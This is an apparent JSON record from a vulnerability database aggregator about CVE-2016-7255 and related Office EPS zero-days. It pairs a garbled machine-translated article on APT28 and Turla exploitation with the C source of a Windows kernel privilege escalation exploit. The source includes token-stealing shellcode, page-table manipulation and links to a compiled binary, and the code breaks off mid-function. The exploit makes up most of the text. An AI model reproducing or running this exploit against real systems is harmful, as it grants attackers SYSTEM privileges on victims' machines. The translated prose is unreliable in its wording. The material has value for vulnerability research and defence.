"HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-31T00:00:00", "type": "myhack58", "title": "CVE-2016-7255: analysis of Mining the Windows kernel to mention the right vulnerability-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7855", "CVE-2016-7255"], "modified": "2016-12-31T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2016/82548.htm", "id": "MYHACK58:62201682548", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-05-17T11:27:29", "edition": 2, "description": "In 2015, FireEye released a Microsoft Office EPS\uff08Encapsulated PostScript in the two vulnerability details. Wherein, a is 0day vulnerabilities, one in the attack a few weeks before playing the patch. Recently, FireEye and Microsoft Office products in the discovery of three new 0day vulnerabilities, these vulnerabilities are being the attacker. \nIn 2017 at the end of 3, We detected another malicious file, which uses the EPS of the unknown vulnerabilities and the Windows Graphics Device Interface GDI in the recently patched vulnerability to deliver malicious software. Subsequently, Microsoft in the 2017 year 4 months to deactivate the EPS, but FireEye in EPS, and found a second unknown vulnerability. \nFireEye believes that there are two organizations Turla and another unknown financial criminal organizations is the use of the first EPS 0day Vulnerability CVE-2017-0261, and APT28, is to use the second EPS 0day Vulnerability CVE-2017-0262 and a new privilege escalation\uff08EOP\uff09 0day Vulnerability CVE-2017-0263 in. Turla and APT28 is Russian cyber espionage organizations, they will these 0day vulnerabilities applied to European Foreign and military Department. And this unidentified financial crime organizations are specifically targeted in the Middle East with offices of regional banks and global banks. In the following, we proceed with the introduction of EPS 0day vulnerabilities, related malware and new EOP 0day vulnerabilities. Each EPS 0day vulnerabilities are provided in the corresponding EOP exploit code, in order to provide the right, the code must bypass the sandbox, in order to perform the processing for the EPS FLTLDR. EXE instance. \nWe found that the malicious file is used for the delivery of three different payload. CVE-2017-0261 for delivery SHIRIME\uff08Turla and NETWIRE\uff08unknown financial crime organization, CVE-2017-0262 for delivery GAMEFISH\uff08APT28 it. CVE-2017-0263 for delivery GAMEFISH payload during the elevated privileges. \nFireEye the company's e-mail and network product detects these malicious files. \nIn these Vulnerability Information Disclosure, FireEye has been with the Microsoft Security Response Center MSRC for coordination. Microsoft recommends that all customers follow the security advice ADV170005 in the guidance, do a good job related security and Defense work. \nCVE-2017-0261--EPS\u201crestore\u201dUAF vulnerability \nOpen the Office document, FLTLDR. EXE will be used for rendering included the vulnerability of the embedded EPS image. Here the EPS file is a PostScript program, you can\u201crestore\u201doperation using the UAF vulnerability. \nAccording to the PostScript of the official Description:\u201ca local VM object allocation and the local VM in the existing objects of the modified called by the save and restore function is completed, in the name of the corresponding operation identifier, you can refer to them. save and restore can be used to package in the local VM in the PostScript language program related to the code. restore to be able to release the newly created object, and undo from the corresponding save operation after the existing object to modify.\u201d \nAs described above, the restore operation will be recovered from the save operation after the allocated memory. For the UAF vulnerability to say, when the forall operation of the combination, then it could not be better. Figure 1 shows the use of the save and restore operation of the pseudo-code. \n! [](/Article/UploadPic/2017-5/2017517184135487. png? www. myhack58. com) \nFigure 1: exploit the pseudo-code \nThe following operation allows the pseudo-code leaks the metadata, in order to achieve the Read/Write primitives: \n1\\. Create forall_proc array, only a single restore proc elements \n2\\. The EPS state is saved to eps_state \n3\\. In the Save created after the uaf_array \n4\\. Use forall operation to traverse uaf_array elements, for each element call forall_proc \n5\\. The uaf_array the first element is passed to the restore_proc of the call, the process contained in the forall_proc. \n6\\. restore_proc \nTo restore the initial state, the release uaf_array \nalloc_string process will be recycled to release the uaf_array \nforall_proc to call leak_proc \n7\\. forall operation of the follow-up calls for the recovery of uaf_array each element of the call leak_proc, these elements are now stored alloc_string the results of the process \nFigure 2 demonstrates in recovery after using uaf_array the debug log. \n! [](/Article/UploadPic/2017-5/2017517184136535. png? www. myhack58. com) \nFigure 2: uaf_array recycle the debug log \nThrough the operation of save operation after the identifier of the operation, the attacker can manipulate the memory layout, and the UAF vulnerability is converted to a read/write primitive. Figure 3 shows a forgery of the string, the length is set to 0x7fffffff, the cardinality is 0. \n! [](/Article/UploadPic/2017-5/2017517184136165. png? www. myhack58. com) \nFigure 3: Forge of the string object \nThe use of read and write arbitrary user memory capacity, The EPS program may further search the gadgets to build ROP chains, and create a file object. Figure 4 shows the in-memory fake file objects. \n! [](/Article/UploadPic/2017-5/2017517184136436. png? www. myhack58. com) \nFigure 4: with the ROP of the pseudo-file object \nBy Faking the file object call to closefile, the exploit code can be transferred to the ROP and start the shellcode with. Figure 5 shows closefile processing program part of the disassembly procedure. \n! [](/Article/UploadPic/2017-5/2017517184136717. png? www. myhack58. com) \nFigure 5: closefile Stack Pivot the disassembly code \nOnce executed, the malware will use the ROP chain to modify the stored shellcode memory region of the protection mechanisms. Thus, the shellcode will be able to perform FLTLDR. EXE running in a sandbox, and at the same time, in order to escape the sandbox detection, it also needs to further mention the right. \nAccording to FireEye found that the use of the vulnerability of the EPS program has two different versions. Wherein st07383. en17. docx using 32 or 64 bit version of CVE-2017-0001 to provide the right, and then perform a contains called SHIRIME malware inject the JavaScript payload. SHIRIME is Turla commonly used specially crafted JavaScript injector one, as the first stage of the payload into the target system, and implements the management and control functions. From the beginning of 2016 since we observed in the wild using the SHIRIME had many times revision, in this 0day vulnerability used in the attack was the latest version, v1. 0. 1004\uff09 \nThe second document Confirmation_letter. docx using 32 or 64 bit version of CVE-2016-7255 to mention the right, and then injected into the NETWIRE malware a new variant. According to our observation, the file is a different version of the file name is very similar. \nThese documents in the EPS program contains different logic to complete the ROP chain and shellcode construct. At the same time, it also uses a simple algorithm for the shellcode part of the obfuscation process, specifically as shown in Figure 6. \n\n\n**[1] [[2]](<86206_2.htm>) [[3]](<86206_3.htm>) [next](<86206_2.htm>)**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-17T00:00:00", "title": "For the APT organization to use the EPS vulnerabilities in and mention the right vulnerability analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0001", "CVE-2017-0263", "CVE-2016-7255", "CVE-2017-0262", "CVE-2017-0261"], "modified": "2017-05-17T00:00:00", "id": "MYHACK58:62201786206", "href": "http://www.myhack58.com/Article/html/3/62/2017/86206.htm", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2022-01-13T05:42:07", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-08T00:00:00", "type": "exploitdb", "title": "Microsoft Windows Kernel - 'win32k.sys NtSetWindowLongPtr' Local Privilege Escalation (MS16-135) (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255", "2016-7255"], "modified": "2017-01-08T00:00:00", "id": "EDB-ID:41015", "href": "https://www.exploit-db.com/exploits/41015", "sourceData": "/*\r\nSource: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html\r\n\r\nBinary: https://github.com/rlarabee/exploits/raw/8b9eb646516d7f022a010f28018209f331c28975/cve-2016-7255/compiled/cve-2016-7255.exe\r\nMirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41015.exe\r\n*/\r\n\r\n// ricklarabee.blogspot.com\r\n\r\n//This program is free software; you can redistribute it and/or\r\n//modify it under the terms of the GNU General Public License\r\n//as published by the Free Software Foundation.\r\n\r\n//This program is distributed in the hope that it will be useful,\r\n//but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n//MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the\r\n//GNU General Public License for more details.\r\n\r\n//You should have received a copy of the GNU General Public License\r\n//along with this program; if not, write to the Free Software\r\n//Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\r\n\r\n// Credits: enrique.nissim@IOActive.com: https://github.com/IOActive/I-know-where-your-page-lives/tree/master/code/CVE-2016-7255\r\n// PoC from https://github.com/tinysec/public/tree/master/CVE-2016-7255\r\n\r\n#include <windows.h>\r\n#include <wchar.h>\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n\r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"user32.lib\")\r\n#pragma comment(lib, \"advapi32\")\r\n\r\nUINT64 PML4_BASE;\r\nUINT PML4_SELF_REF_INDEX;\r\nUINT64 PML4_SELF_REF = 0xFFFFF6FB7DBEDF68;\r\n\r\n#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)\r\n#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)\r\n#define GET_INDEX(va) ( ((va >> 39) & 0x1ff )) \r\n\r\n////////////////////////////////////////////////////////\r\n// Define Data Types\r\n////////////////////////////////////////////////////////\r\ntypedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {\r\n PVOID Unknown1;\r\n PVOID Unknown2;\r\n PVOID Base;\r\n ULONG Size;\r\n ULONG Flags;\r\n USHORT Index;\r\n USHORT NameLength;\r\n USHORT LoadCount;\r\n USHORT PathLength;\r\n CHAR ImageName[256];\r\n} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;\r\n\r\ntypedef struct _SYSTEM_MODULE_INFORMATION {\r\n ULONG Count;\r\n SYSTEM_MODULE_INFORMATION_ENTRY Module[1];\r\n} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;\r\n\r\ntypedef enum _SYSTEM_INFORMATION_CLASS { \r\n SystemModuleInformation = 11,\r\n SystemHandleInformation = 16\r\n} SYSTEM_INFORMATION_CLASS;\r\n\r\ntypedef NTSTATUS (WINAPI *NtQuerySystemInformation_t)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass,\r\n OUT PVOID SystemInformation,\r\n IN ULONG SystemInformationLength,\r\n OUT PULONG ReturnLength);\r\n\r\ntypedef NTSTATUS (WINAPI *NtQueryIntervalProfile_t)(IN ULONG ProfileSource,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tOUT PULONG Interval);\r\n\r\nNtQuerySystemInformation_t NtQuerySystemInformation;\r\nNtQueryIntervalProfile_t NtQueryIntervalProfile;\r\n \r\nchar shellcode[] = {\r\n\t//0xcc,\r\n\t0xfa, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// CLI\r\n\t0x9c, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSHFQ\r\n\t0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, \t// MOV RAX, Original Pointer\r\n\t0x50, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RAX\r\n\t0x51, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RCX\r\n\t0x48, 0xb9, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, \t// MOV RCX, [OverwriteAddr+OverwriteOffset]\r\n\t0x48, 0x89, 0x01, \t\t\t\t\t\t\t\t\t\t\t\t// MOV QWORD PTR [RCX], RAX\r\n\t0xb9, 0x90, 0x90, 0x90, 0x90, \t\t\t\t\t\t\t\t\t// MOV ECX, PID\r\n\t0x53, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RBX\r\n\r\n\t0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, \t\t\t// MOV RAX,QWORD PTR gs:0x188\r\n\t0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00,\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS\r\n\t0x48, 0x8d, 0x80, 0x90, 0x90, 0x00, 0x00,\t\t\t\t\t\t// LEA RAX,[RAX+0xActiveProcessLinkOffset] \r\n\t//<tag>\r\n\t0x48, 0x8b, 0x00,\t\t\t\t\t\t\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX]\r\n\t0x48, 0x8b, 0x58, 0xf8,\t\t\t\t\t\t\t\t\t\t\t// MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\r\n\t0x48, 0x83, 0xfb, 0x04,\t\t\t\t\t\t\t\t\t\t\t// CMP RBX,0x4\r\n\t0x75, 0xf3,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// JNE <tag>\r\n\t0x48, 0x8b, 0x98, 0x90, 0x90, 0x90, 0x90,\t\t\t\t\t\t// MOV RBX, QWORD PTR [RAX+0x60] // GET TOKEN of SYSTEM\r\n\r\n\t0x53, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// PUSH RBX\r\n\t//<tag2>\r\n\t0x48, 0x8b, 0x00,\t\t\t\t\t\t\t\t\t\t\t\t// MOV RAX,QWORD PTR [RAX]\r\n\t0x48, 0x8b, 0x58, 0xf8,\t\t\t\t\t\t\t\t\t\t\t// MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID\r\n\t0x39, 0xcb,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// CMP EBX, ECX // our PID\r\n\t0x75, 0xf5,\t\t\t\t\t\t\t\t\t\t\t\t\t\t// JNE <tag2>\r\n\t0x5b, \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t// POP RBX\r\n\t0x48, 0x89, 0x98, 0x90, 0x90, 0x90, 0x90,\t\t\t\t\t\t// MOV QWORD PTR[RAX + 0x60], RBX\r\n\r\n\t0x5b, // POP RBX\r\n\t0x59, // POP RCX\r\n\t0x58, // POP RAX\r\n\t0x9d, // POPFQ\r\n\r\n\t0xfb, // STI\r\n\t0xff, 0xe0 // JMP RAX\r\n};\r\n\r\nULONG __cdecl DbgPrint(__in char* Format, ...)\r\n{\r\n\tCHAR* pszDbgBuff = NULL;\r\n\tva_list VaList = NULL;\r\n\tULONG ulRet = 0;\r\n\r\n\tdo\r\n\t{\r\n\t\tpszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0, 1024 * sizeof(CHAR));\r\n\t\tif (NULL == pszDbgBuff)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tRtlZeroMemory(pszDbgBuff, 1024 * sizeof(CHAR));\r\n\r\n\t\tva_start(VaList, Format);\r\n\r\n\t\t_vsnprintf((CHAR*)pszDbgBuff, 1024 - 1, Format, VaList);\r\n\r\n\r\n\t\tOutputDebugStringA(pszDbgBuff);\r\n\r\n\t\tva_end(VaList);\r\n\r\n\t} while (FALSE);\r\n\r\n\tif (NULL != pszDbgBuff)\r\n\t{\r\n\t\tHeapFree(GetProcessHeap(), 0, pszDbgBuff);\r\n\t\tpszDbgBuff = NULL;\r\n\t}\r\n\r\n\treturn ulRet;\r\n}\r\n\r\n\r\nint _sim_key_down(WORD wKey)\r\n{\r\n\tINPUT stInput = { 0 };\r\n\r\n\tdo\r\n\t{\r\n\t\tstInput.type = INPUT_KEYBOARD;\r\n\t\tstInput.ki.wVk = wKey;\r\n\t\tstInput.ki.dwFlags = 0;\r\n\r\n\t\tSendInput(1, &stInput, sizeof(stInput));\r\n\r\n\t} while (FALSE);\r\n\r\n\treturn 0;\r\n}\r\n\r\nint _sim_key_up(WORD wKey)\r\n{\r\n\tINPUT stInput = { 0 };\r\n\r\n\tdo\r\n\t{\r\n\t\tstInput.type = INPUT_KEYBOARD;\r\n\t\tstInput.ki.wVk = wKey;\r\n\t\tstInput.ki.dwFlags = KEYEVENTF_KEYUP;\r\n\r\n\t\tSendInput(1, &stInput, sizeof(stInput));\r\n\r\n\t} while (FALSE);\r\n\r\n\treturn 0;\r\n}\r\n\r\nint _sim_alt_shift_esc()\r\n{\r\n\tint i = 0;\r\n\r\n\tdo\r\n\t{\r\n\t\t_sim_key_down(VK_MENU);\r\n\t\t_sim_key_down(VK_SHIFT);\r\n\r\n\r\n\t\t_sim_key_down(VK_ESCAPE);\r\n\t\t_sim_key_up(VK_ESCAPE);\r\n\r\n\t\t_sim_key_down(VK_ESCAPE);\r\n\t\t_sim_key_up(VK_ESCAPE);\r\n\r\n\t\t_sim_key_up(VK_MENU);\r\n\t\t_sim_key_up(VK_SHIFT);\r\n\r\n\r\n\t} while (FALSE);\r\n\r\n\treturn 0;\r\n}\r\n\r\n\r\n\r\nint _sim_alt_shift_tab(int nCount)\r\n{\r\n\tint i = 0;\r\n\tHWND hWnd = NULL;\r\n\r\n\r\n\tint nFinalRet = -1;\r\n\r\n\tdo\r\n\t{\r\n\t\t_sim_key_down(VK_MENU);\r\n\t\t_sim_key_down(VK_SHIFT);\r\n\r\n\r\n\t\tfor (i = 0; i < nCount; i++)\r\n\t\t{\r\n\t\t\t_sim_key_down(VK_TAB);\r\n\t\t\t_sim_key_up(VK_TAB);\r\n\r\n\t\t\tSleep(1000);\r\n\r\n\t\t}\r\n\r\n\r\n\t\t_sim_key_up(VK_MENU);\r\n\t\t_sim_key_up(VK_SHIFT);\r\n\t} while (FALSE);\r\n\r\n\treturn nFinalRet;\r\n}\r\n\r\nint _sim_alt_esc(int count)\r\n{\r\n\tint i = 0;\r\n\r\n\tfor (i = 0; i<count; i++)\r\n\t{\r\n\t\t_sim_key_down(VK_MENU);\r\n\t\t//_sim_key_down(VK_SHIFT);\r\n\r\n\r\n\t\t_sim_key_down(VK_ESCAPE);\r\n\t\t_sim_key_up(VK_ESCAPE);\r\n\r\n\t\t_sim_key_down(VK_ESCAPE);\r\n\t\t_sim_key_up(VK_ESCAPE);\r\n\r\n\t\t_sim_key_up(VK_MENU);\r\n\t\t//_sim_key_up(VK_SHIFT);\r\n\r\n\t}\r\n\r\n\treturn 0;\r\n}\r\n\r\n\r\nint or_address_value_4(__in void* pAddress)\r\n{\r\n\tWNDCLASSEXW stWC = { 0 };\r\n\r\n\tHWND hWndParent = NULL;\r\n\tHWND hWndChild = NULL;\r\n\r\n\tWCHAR* pszClassName = L\"cve-2016-7255\";\r\n\tWCHAR* pszTitleName = L\"cve-2016-7255\";\r\n\r\n\tvoid* pId = NULL;\r\n\tMSG stMsg = { 0 };\r\n\r\n\tUINT64 value = 0;\r\n\r\n\tdo\r\n\t{\r\n\r\n\t\tstWC.cbSize = sizeof(stWC);\r\n\t\tstWC.lpfnWndProc = DefWindowProcW;\r\n\t\tstWC.lpszClassName = pszClassName;\r\n\r\n\t\tif (0 == RegisterClassExW(&stWC))\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\thWndParent = CreateWindowExW(\r\n\t\t\t0,\r\n\t\t\tpszClassName,\r\n\t\t\tNULL,\r\n\t\t\tWS_OVERLAPPEDWINDOW | WS_VISIBLE,\r\n\t\t\t0,\r\n\t\t\t0,\r\n\t\t\t360,\r\n\t\t\t360,\r\n\t\t\tNULL,\r\n\t\t\tNULL,\r\n\t\t\tGetModuleHandleW(NULL),\r\n\t\t\tNULL\r\n\t\t);\r\n\r\n\t\tif (NULL == hWndParent)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n\t\thWndChild = CreateWindowExW(\r\n\t\t\t0,\r\n\t\t\tpszClassName,\r\n\t\t\tpszTitleName,\r\n\t\t\tWS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD,\r\n\t\t\t0,\r\n\t\t\t0,\r\n\t\t\t160,\r\n\t\t\t160,\r\n\t\t\thWndParent,\r\n\t\t\tNULL,\r\n\t\t\tGetModuleHandleW(NULL),\r\n\t\t\tNULL\r\n\t\t);\r\n\r\n\t\tif (NULL == hWndChild)\r\n\t\t{\r\n\t\t\tbreak;\r\n\t\t}\r\n\r\n#ifdef _WIN64\r\n\t\tpId = ((UCHAR*)pAddress - 0x28);\r\n#else\r\n\t\tpId = ((UCHAR*)pAddress - 0x14);\r\n#endif // #ifdef _WIN64\r\n\r\n\t\tSetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId);\r\n\r\n\t\tDbgPrint(\"hWndChild = 0x%p\\n\", hWndChild);\r\n\r\n\t\tShowWindow(hWndParent, SW_SHOWNORMAL);\r\n\r\n\t\tSetParent(hWndChild, GetDesktopWindow());\r\n\r\n\t\tSetForegroundWindow(hWndChild);\r\n\r\n\t\t_sim_alt_shift_tab(4);\r\n\r\n\t\tSwitchToThisWindow(hWndChild, TRUE);\r\n\r\n\t\t_sim_alt_shift_esc();\r\n\r\n\t\twhile (GetMessage(&stMsg, NULL, 0, 0)) {\r\n\t\t\t\r\n\t\t\tSetFocus(hWndParent);\r\n\t\t\t_sim_alt_esc(20);\r\n\t\t\tSetFocus(hWndChild);\r\n\t\t\t_sim_alt_esc(20);\r\n\r\n\t\t\tTranslateMessage(&stMsg);\r\n\t\t\tDispatchMessage(&stMsg);\r\n\t\t\t\r\n\t\t\tif (value != 0) {\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\t\r\n\r\n\t\t\t__try {\r\n\t\t\t\tvalue = *(UINT64 *)PML4_SELF_REF;\r\n\t\t\t\tif ((value & 0x67) == 0x67) {\r\n\t\t\t\t\tprintf(\"Value Self Ref = %llx\\n\", value);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\t__except (EXCEPTION_EXECUTE_HANDLER) {\r\n\t\t\t\tcontinue;\r\n\t\t\t}\r\n\r\n\t\t}\r\n\r\n\r\n\t} while (FALSE);\r\n\r\n\tif (NULL != hWndParent)\r\n\t{\r\n\t\tDestroyWindow(hWndParent);\r\n\t\thWndParent = NULL;\r\n\t}\r\n\r\n\tif (NULL != hWndChild)\r\n\t{\r\n\t\tDestroyWindow(hWndChild);\r\n\t\thWndChild = NULL;\r\n\t}\r\n\r\n\tUnregisterClassW(pszClassName, GetModuleHandleW(NULL));\r\n\r\n\treturn 0;\r\n}\r\n\r\nUINT64 get_pxe_address(UINT64 address) {\r\n\tUINT entry = PML4_SELF_REF_INDEX;\r\n\tUINT64 result = address >> 9;\r\n\tUINT64 lower_boundary = ((UINT64)0xFFFF << 48) | ((UINT64)entry << 39);\r\n\tUINT64 upper_boundary = (((UINT64)0xFFFF << 48) | ((UINT64)entry << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8;\r\n\tresult = result | lower_boundary;\r\n\tresult = result & upper_boundary;\r\n\treturn result;\r\n}\r\n\r\nUINT64 look_free_entry_pml4(void) {\r\n\t// Looks for a free pml4e in the last 0x100 bytes of the PML4\r\n\tint offset = 0xF00;\r\n\tUINT64 pml4_search = PML4_BASE + offset;\r\n\twhile (offset < 0xFF8)\r\n\t{\r\n\t\tif ((*(PVOID *)pml4_search) == 0x0)\r\n\t\t{\r\n\t\t\t// This is a NULL (free) entry\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\toffset += 8;\r\n\t\tpml4_search = PML4_BASE + offset;\r\n\t}\r\n\treturn pml4_search;\r\n}\r\n\r\nUINT64 calculate_spurious_pt_address(UINT64 spurious_offset) {\r\n\tUINT64 index = (spurious_offset & 0xFFF) / 8;\r\n\tUINT64 result = (\r\n\t\t((UINT64)0xFFFF << 48) |\r\n\t\t((UINT64)PML4_SELF_REF_INDEX << 39) |\r\n\t\t((UINT64)PML4_SELF_REF_INDEX << 30) |\r\n\t\t((UINT64)PML4_SELF_REF_INDEX << 21) |\r\n\t\t(index << 12)\r\n\t\t);\r\n\treturn result;\r\n}\r\n\r\n\r\n\r\nUINT64 create_spurious_pte_to_virtual_address(UINT64 virtual_address, BOOL patch_original) {\r\n\r\n\t/*\r\n\t1: kd> !pte ffffffff`ffd00000\r\n\tVA ffffffffffd00000\r\n\tPXE at FFFFF6FB7DBEDFF8 PPE at FFFFF6FB7DBFFFF8 PDE at FFFFF6FB7FFFFFF0 PTE at FFFFF6FFFFFFE800\r\n\tcontains 0000000000A1F063 contains 0000000000A20063 contains 0000000000A25063 contains 8000000000103963\r\n\tpfn a1f-- - DA--KWEV pfn a20-- - DA--KWEV pfn a25-- - DA--KWEV pfn 103 - G - DA--KW - V\r\n\t*/\t\r\n\r\n\tUINT64 pte = get_pxe_address(virtual_address);\r\n\tint pte_offset = pte & 0xFFF;\r\n\t//printf(\"PTE: %llx, %x\\n\", pte, pte_offset);\r\n\t\r\n\tUINT64 pde = get_pxe_address(pte);\r\n\tint pde_offset = pde & 0xFFF;\r\n\t//printf(\"PDE: %llx, %x\\n\", pde, pde_offset);\r\n\t\t\r\n\tUINT64 pdpte = get_pxe_address(pde);\r\n\tint pdpte_offset = pdpte & 0xFFF;\r\n\t//printf(\"PDPTE: %llx,%x\\n\", pdpte, pdpte_offset);\r\n\t\t\r\n\tUINT64 pml4e = get_pxe_address(pdpte);\r\n\tint pml4e_offset = pml4e & 0xFFF;\r\n\t//printf(\"PML4E: %llx\\n\", pml4e, pml4e_offset);\r\n\t\r\n\tUINT64 spurious_offset = look_free_entry_pml4();\r\n\tprintf(\"[+] Selected spurious PML4E: %llx\\n\", spurious_offset);\r\n\tUINT64 f_e_pml4 = spurious_offset;\r\n\tUINT64 spurious_pt = calculate_spurious_pt_address(spurious_offset);\r\n\tprintf(\"[+] Spurious PT: %llx\\n\", spurious_pt);\r\n\tprintf(\"--------------------------------------------------\\n\\n\");\r\n\t\r\n\t\r\n\t//Read the physical address of pml4e\t\r\n\tUINT64 pml4e_pfn = (UINT64)(*(PVOID *)pml4e);\r\n\tprintf(\"[+] Content pml4e %llx: %llx\\n\", pml4e, pml4e_pfn);\r\n\t// Change the PxE\r\n\tpml4e_pfn = pml4e_pfn | 0x67; // Set U/S\r\n\t\r\n\tprintf(\"[+] Patching the Spurious Offset (PML4e) %llx: %llx\\n\",f_e_pml4, pml4e_pfn);\r\n\t*((PVOID *)spurious_offset) = (PVOID)pml4e_pfn;\r\n\tSleep(0x1); // Sleep for TLB refresh;\r\n\t\r\n\t//Read the physical address of pdpte\r\n\tUINT64 pdpte_pfn = (UINT64) *(PVOID *)(spurious_pt + pdpte_offset);\r\n\tprintf(\"[+] Content pdpte %llx: %llx\\n\", pdpte, pdpte_pfn);\r\n\t// Change the PxE\r\n\tpdpte_pfn = pdpte_pfn | 0x67; // Set U/S\r\n\tprintf(\"[+] Patching the Spurious Offset (PDPTE) %llx: %llx\\n\", spurious_offset, pdpte_pfn);\r\n\t*((PVOID *)spurious_offset) = (PVOID)pdpte_pfn;\r\n\tSleep(0x1); // Sleep for TLB refresh;\r\n\t\r\n\t//Read the physical address of pde\r\n\tUINT64 pde_addr = spurious_pt + pde_offset;\r\n\tUINT64 pde_pfn = (UINT64) *(PVOID *)(spurious_pt + pde_offset);\r\n\tprintf(\"[+] Content pdpe %llx: %llx\\n\", pde, pde_pfn);\r\n\t// Change the PxE\r\n\tpde_pfn = pde_pfn | 0x67; // Set U/S\r\n\tprintf(\"[+] Patching the Spurious Offset (PDE) %llx: %llx\\n\", spurious_offset, pde_pfn);\r\n\t*((PVOID *)spurious_offset) = (PVOID)pde_pfn;\r\n\tSleep(0x1); // Sleep for TLB refresh;\r\n\t\r\n\t//Read the physical address of pte\r\n\tUINT64 pte_addr = spurious_pt + pte_offset;\r\n\tUINT64 pte_pfn = (UINT64) *(PVOID *)(spurious_pt + pte_offset);\r\n\tprintf(\"[+] Content pte %llx: %llx\\n\", pte, pte_pfn);\r\n\t// Change 